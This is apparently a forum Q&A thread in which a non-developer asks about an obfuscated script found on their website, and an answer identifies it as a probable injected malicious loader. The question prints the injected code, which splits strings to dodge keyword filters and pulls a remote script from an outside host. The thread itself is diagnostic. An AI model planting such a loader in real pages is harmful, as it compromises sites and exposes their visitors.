# Could someone explain this JavaScript code

Tags: javascript

Please explain the meaning of this code:

```
<script type="text/javascript" language="javascript">
    document.write('<scri' + 'pt type="text/javas' + 'cript" language="javas' + 'cript" src="' + top.location.protocol + '//c.sitehelp.inkiev.net/code.cgi?c=4067' + (top.location.protocol=='http:' ? '' : '&ssl=1') + '&rnd=' + Math.random() + '"></sc' + 'ript>');
</script>
```

---

Ohhh, so many minuses . I try to simplify the expression, read about the document.write () and became clear. Why someone added it to my website?

```
<script 
    type="text/javascript" 
    language="javascript" 
    src="'http://c.sitehelp.inkiev.net/code.cgi?c=4067&rnd=' + Math.random() + '">
</script>
```

Comment: You don't know what does `document.write()` means?

Comment: It couldn't be clearer - what don't you understand? And why have you tagged this with "hacking"?

Comment: Yes I don't know. I'm not a web developer , but I was surprised that my site has a link to ...//c.sitehelp.inkiev.net/code.cgi?c=4067

Answer (score 1, accepted):

Your site was probably compromised and someone injected javascript code. Someone moderately knowledgeable should take the website offline, clean up, patch any vulnerabilities by updating whatever services it uses (e.g. wordpress) and then put it back online.
The code attempts to avoid keyword blacklisting by splitting the string. It retrieves a probably malicious script from the url it generates.